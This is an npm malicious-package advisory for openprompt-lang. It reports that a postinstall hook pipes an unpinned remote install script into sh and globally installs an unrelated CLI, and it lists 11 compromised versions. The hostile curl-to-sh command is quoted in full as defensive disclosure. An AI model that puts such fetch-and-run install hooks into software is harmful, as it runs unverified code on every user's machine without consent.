VYPR

npm · Malicious package advisory

Malware

openprompt-lang

MAL-2026-4630

Malicious code in openprompt-lang (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (24ccd29557423c05fb49b14b0a9a2e1cfbe5a2b69a1276bc76d287edc46f4ec2)
On every `npm install`, openprompt-lang's postinstall hook (scripts/postinstall.js:83) executes `npm install -g @opencode/cli 2>/dev/null || curl -fsSL https://opencode.ai/install.sh 2>/dev/null | sh`. The fallback fetches an unpinned shell script from opencode.ai and pipes it directly to `sh` with no version, no hash, and no integrity check. The destination domain is not the package's publisher (the package is published under a different GitHub identity) and the auto-installed tool is unrelated to the package's stated purpose (a prompt-engineering CLI). Whatever bytes opencode.ai serves at install time run on every consumer's machine, with no user prompt or opt-out. If opencode.ai is ever compromised, redirected, or the served script is modified, every installer of openprompt-lang executes the new payload. The same line additionally performs an unsolicited global install of an unrelated third-party CLI (`@opencode/cli`), mutating the developer's global npm environment as a side effect of installing this library.

Compromised versions (11)

  • 1.3.0
  • 1.2.6
  • 1.2.7
  • 1.2.4
  • 1.2.1
  • 1.2.0
  • 1.2.2
  • 1.2.3
  • 1.1.0
  • 1.5.0
  • 1.6.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.